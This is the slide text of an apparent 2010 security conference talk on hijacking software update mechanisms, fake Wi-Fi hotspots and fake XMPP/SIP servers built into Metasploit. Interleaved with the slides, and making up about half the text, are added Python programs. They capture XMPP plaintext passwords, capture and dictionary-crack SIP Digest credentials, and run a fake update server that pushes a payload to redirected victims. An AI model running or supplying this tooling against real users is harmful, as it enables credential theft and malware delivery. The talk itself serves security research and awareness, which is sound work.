2. Overview
Introduction
Background
Title
Realization
Results
Conclusion
Demos in between!
nullcon Goa 2010 http://nullcon.net
3. Introduction
IT Security
Increasing attacks
4. Introduction
IT Security
Increasing attacks
also in Germany
5. Introduction
Know your enemy!
"So it is said that if you know your enemies and know yourself, you will fight without danger in battles. If you only know yourself, but not your opponent, you may win or may lose. If you know neither yourself nor your enemy, you will always endanger yourself."
6. Background
The man in the middle
The hacker tools
Evilgrade
Metasploit
Karma + Karmetasploit
7. The man in the middle attack
8. Known MitM attacks
ARP spoofing
DNS spoofing
BGP hijacking
ICMP redirect, ...
Karma!
The evil twin hotspot
9. Background
The hacker tools
10. Evilgrade
Framework for attacking weak update mechanisms
"The idea ... is the centralization and exploitation of different update impl. all together in one tool"
Written in Perl and published 2007-2008
Existing modules
Sun Java
Apple OS X
11. Evilgrade
How does it work
14. Metasploit
Vulnerability development framework
Reduces the work needed to create an exploit
Penetration testing
Several hundred exploits
#5 in the top 100 security tools
Written in Ruby and BSD licensed
"Don't try to teach yourself how to use metasploit under the security camera at the airport"
16. Karma
The evil twin access point
MitM attack on Windows XP Wireless Zero Configuration: the client probes for every remembered network, and Karma answers as whichever one it asks for
Or just name the hotspot "FreeWifi" ;)
After the MitM, steal authentication data
HTTP, FTP, POP3, IMAP and so on
Released in 2004
17. Karmetasploit
Reimplementation of Karma in Metasploit
Fake access point provided by airbase-ng from aircrack-ng
Authentication capturing implemented as auxiliary modules for Metasploit
Several improvements
Better hardware support
Cookie and form data stealing
Browser exploitation
18. Goals
Evilgrade 2 Metasploit
Reimplement the functionality as a Metasploit module
Improve the new system
• Port sharing, stealth mode, faster Metasploit payload generation
Transfer the existing Evilgrade modules into the new system
Create new fake servers
SIP and XMPP
Find new vulnerabilities in software
19. Fake XMPP
Based on TCP
Used for Jabber → instant messaging (Google Talk, ...)
Has built-in strong security (TLS, SASL), but what is actually used depends on server and client configuration
Cleartext password transmission possible
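How the cleartext case above comes about, as an added example that is not code from the talk or from the Karmetasploit module: the fake server's stream features offer only the SASL PLAIN mechanism and no STARTTLS, and a client whose configuration tolerates that answers with base64("\0user\0password"), which the server simply decodes. The client-side model and the sample `<auth>` stanza are constructed for this example; the namespaces are the standard XMPP ones.

```python
import base64
import xml.etree.ElementTree as ET

NS_STREAM = "http://etherx.jabber.org/streams"
NS_SASL = "urn:ietf:params:xml:ns:xmpp-sasl"
NS_TLS = "urn:ietf:params:xml:ns:xmpp-tls"


def stream_features(offer_starttls: bool, mechanisms) -> str:
    """Build the <stream:features> a server sends after the stream header.
    A fake server offers only PLAIN and omits <starttls/>, so a client that
    does not insist on TLS authenticates in the clear."""
    mech_xml = "".join(f"<mechanism>{m}</mechanism>" for m in mechanisms)
    tls_xml = f"<starttls xmlns='{NS_TLS}'><required/></starttls>" if offer_starttls else ""
    return (f"<stream:features xmlns:stream='{NS_STREAM}'>"
            f"{tls_xml}<mechanisms xmlns='{NS_SASL}'>{mech_xml}</mechanisms>"
            f"</stream:features>")


def client_decides(features_xml: str, require_tls: bool) -> str:
    """Model of the client side: a client that requires TLS aborts on a stream
    without <starttls/>; a permissive one picks PLAIN if it is offered."""
    feats = ET.fromstring(features_xml)
    has_tls = feats.find(f"{{{NS_TLS}}}starttls") is not None
    mechs = [m.text for m in feats.iter(f"{{{NS_SASL}}}mechanism")]
    if require_tls and not has_tls:
        return "abort"
    return "PLAIN" if "PLAIN" in mechs else "abort"


def decode_sasl_plain(auth_stanza: str):
    """Parse a client <auth mechanism='PLAIN'> stanza. The RFC 4616 payload is
    authzid NUL authcid NUL password; return (authzid, user, password).
    Any other mechanism returns None, since only PLAIN is cleartext."""
    el = ET.fromstring(auth_stanza)
    if el.tag != f"{{{NS_SASL}}}auth" or el.get("mechanism") != "PLAIN":
        return None
    raw = base64.b64decode((el.text or "").strip())
    parts = raw.split(b"\x00")
    if len(parts) != 3:
        raise ValueError("malformed SASL PLAIN payload")
    return tuple(p.decode("utf-8") for p in parts)


# Constructed sample: what a permissive client sends to the fake server.
SAMPLE_AUTH = (f"<auth xmlns='{NS_SASL}' mechanism='PLAIN'>"
               + base64.b64encode(b"\x00alice\x00s3cret").decode()
               + "</auth>")

if __name__ == "__main__":
    fake = stream_features(offer_starttls=False, mechanisms=["PLAIN"])
    print("permissive client:", client_decides(fake, require_tls=False))
    print("strict client:", client_decides(fake, require_tls=True))
    print("captured:", decode_sasl_plain(SAMPLE_AUTH))
```

The two `client_decides` calls are the whole point of the slide: the protocol can be strong, but the fake server only needs one side to accept the weak offer.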
20. Fake SIP server
UDP based protocol (TCP and TLS transports exist as well)
Redefined in several RFCs
Authentication similar to HTTP Digest
Challenge-response
Try a downgrade attack to Basic authentication
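The Digest exchange a fake registrar sees, as an added example (not the talk's code): the 401 challenge, the parsing of the client's Authorization header, and why capturing that header is enough even when the downgrade fails. RFC 3261 only allows Digest, so a compliant user agent ignores a Basic challenge, which is what the results slides report; but the Digest response without qop is MD5(MD5(user:realm:pass):nonce:MD5(method:uri)), so a captured challenge/response pair can be brute-forced offline. Realm, nonce, user, password and the REGISTER message are constructed for this example.

```python
import hashlib
import re
from typing import Optional


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def sip_challenge(realm: str, nonce: str, scheme: str = "Digest") -> str:
    """401 the fake registrar sends to a REGISTER. scheme='Basic' is the
    downgrade attempt from the talk; RFC 3261 section 22 forbids Basic."""
    if scheme == "Basic":
        auth = f'Basic realm="{realm}"'
    else:
        auth = f'Digest realm="{realm}", nonce="{nonce}", algorithm=MD5'
    return ("SIP/2.0 401 Unauthorized\r\n"
            f"WWW-Authenticate: {auth}\r\n"
            "Content-Length: 0\r\n\r\n")


def client_accepts_challenge(response: str) -> bool:
    """A compliant SIP user agent only answers Digest challenges."""
    m = re.search(r"^WWW-Authenticate:\s*(\w+)", response, re.M | re.I)
    return bool(m) and m.group(1).lower() == "digest"


def parse_authorization(request: str) -> dict:
    """Pull the Digest parameters and the request method out of a captured retry."""
    m = re.search(r"^Authorization:\s*Digest\s+(.*)$", request, re.M | re.I)
    if not m:
        return {}
    params = {}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', m.group(1)):
        params[key.lower()] = quoted or bare
    params["method"] = request.split(" ", 1)[0]
    return params


def digest_response(user, realm, password, method, uri, nonce) -> str:
    """RFC 2617 response without qop: MD5(HA1:nonce:HA2)."""
    ha1 = md5_hex(f"{user}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def crack_digest(params: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack on a captured Digest: recompute the response
    for each candidate password and compare with the captured one."""
    for candidate in wordlist:
        if digest_response(params["username"], params["realm"], candidate,
                           params["method"], params["uri"], params["nonce"]) == params["response"]:
            return candidate
    return None


# Constructed sample REGISTER retry, as a phone would send after the 401.
REALM = "sip.example.test"
NONCE = "5e2c1a9f"
RESPONSE = digest_response("1001", REALM, "1234", "REGISTER", "sip:sip.example.test", NONCE)
SAMPLE_REGISTER = (
    "REGISTER sip:sip.example.test SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
    "From: <sip:1001@sip.example.test>;tag=1928301774\r\n"
    "To: <sip:1001@sip.example.test>\r\n"
    "Call-ID: a84b4c76e66710\r\n"
    "CSeq: 2 REGISTER\r\n"
    f'Authorization: Digest username="1001", realm="{REALM}", nonce="{NONCE}", '
    f'uri="sip:sip.example.test", response="{RESPONSE}", algorithm=MD5\r\n'
    "Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    print("Basic accepted:", client_accepts_challenge(sip_challenge(REALM, NONCE, "Basic")))
    captured = parse_authorization(SAMPLE_REGISTER)
    print("cracked:", crack_digest(captured, ["0000", "password", "1234"]))
```

Because the fake server chooses the nonce, it can also reuse one fixed nonce across victims, which lets precomputed tables replace the per-capture loop in `crack_digest`.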
27. Analysis
1. Install an old version on the target.
2. Sniff the update process from the attacker machine.
3. Analyze the network communication.
4. If possible, try to simulate the update server.
5. If possible, install the latest version on the target.
6. Improve the server to be version independent.
7. Improve the server to allow configuring options, like the description shown as update information to the client.
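Steps 4, 6 and 7 of the procedure above in one place, as an added example that is not the talk's module: a minimal fake update server that answers any update check with "newer version available", using an operator-configured description and payload location. The update protocol here (GET /update?product=...&version=... answered with JSON) is hypothetical; a real target's format is whatever step 3 reconstructed from the sniffed traffic. The payload bytes are a constructed stand-in.

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Operator settings (step 7): the text the victim sees in the update dialog
# and where the fake server serves its payload from.
CONFIG = {
    "description": "Important security update",
    "payload_path": "/download/setup.exe",
    "payload": b"MZ" + b"\x90" * 14,  # constructed stand-in, not a real binary
}


def newer_version(client_version: str) -> str:
    """Version independence (step 6): whatever the client reports, advertise
    something strictly greater by bumping the first component. A version
    string that does not start with a number gets a fixed high value."""
    parts = client_version.split(".")
    try:
        parts[0] = str(int(parts[0]) + 1)
    except ValueError:
        return "99.0"
    return ".".join(parts)


def update_response(path: str, config=CONFIG):
    """Answer the hypothetical update check (step 4). Returns
    (status, content_type, body) so the logic can be tested without sockets."""
    url = urlparse(path)
    qs = parse_qs(url.query)
    if url.path == "/update":
        client_version = qs.get("version", ["0"])[0]
        body = json.dumps({
            "product": qs.get("product", ["unknown"])[0],
            "latest": newer_version(client_version),
            "description": config["description"],
            "url": config["payload_path"],
        }).encode()
        return 200, "application/json", body
    if url.path == config["payload_path"]:
        return 200, "application/octet-stream", config["payload"]
    return 404, "text/plain", b"not found"


class FakeUpdateHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, ctype, body = update_response(self.path)
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # In the lab the victim's traffic is redirected here by one of the MitM
    # techniques from the background slides (ARP or DNS spoofing, evil twin).
    HTTPServer(("127.0.0.1", 8080), FakeUpdateHandler).serve_forever()
```

This only works against the "hacked" class from the results: a client that verifies a signature over the update data or manifest (the uTorrent and VLC cases) or pins the server over SSL (Ad-Aware) rejects what this server hands out.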
28. Results
Fake SIP and XMPP servers
Reimplementation of Evilgrade
Analysis of update implementations
Not hacked
Indirect hacks
Hacked
29. Results – fake server
XMPP
Works
SIP
Downgrade attack was not successful
Capturing of Digest authentication works
DEMO
30. Results
Evilgrade in Metasploit
Reimplemented the old functionality
Old modules ported
Several improvements
• All mentioned ones
• Anti-virus bypassing for metasploit
payloads
( DEMO at the end if time left )
• Some others...
31. Results - Analysis
Not hacked
uTorrent
Avira Antivir
Foxit Reader
VLC uses PGP signatures
Ad-Aware is the only one that uses SSL
Spybot, AVG Antivir, Comodo Firewall, Picasa, ZoneAlarm, WinRAR, FlashGet, Camfrog, ...
32. Results – Not hacked
Not hacked
uTorrent uses binary signed data ?!?
33. Results – Not hacked
Not hacked
Avira Antivir
MASTER.IDX
CRDATE=20090505_1833
<3f76d242c16a5491bfe98540f68c36c9>
34. Results – Not hacked
Foxit Reader and the fzip file format
35. Results - Analysis
Indirect hack
Skype
QuickTime
Orbit Downloader
Miranda IM
DEMO
40. Conclusion
Release candidate of the evil Karmetasploit upgrade is ready
No need for Evilgrade anymore
Several improvements compared to Evilgrade
New authentication capturing servers
Several weak update implementations found, in software with over 100 million downloads from www.cnet.com
41. Conclusion
Feature list for version 2
SIP downgrade attack on old SIP hardware
Fake server: XMPP over HTTP
Improve the design to handle Avira Antivir
Feature list for version 3
Advanced stealth mode
• Intelligent fake DNS server
Find more vulnerabilities
42. Conclusion
Software developers
Please make secure software
Use standards and deny weak stuff by default
And for the rest of us
Be aware of these attack vectors
Do not install every "important security update"
Do not trust security software by default
Do not trust the Internet, especially (public) Wifi networks
43. That's it!
Q & A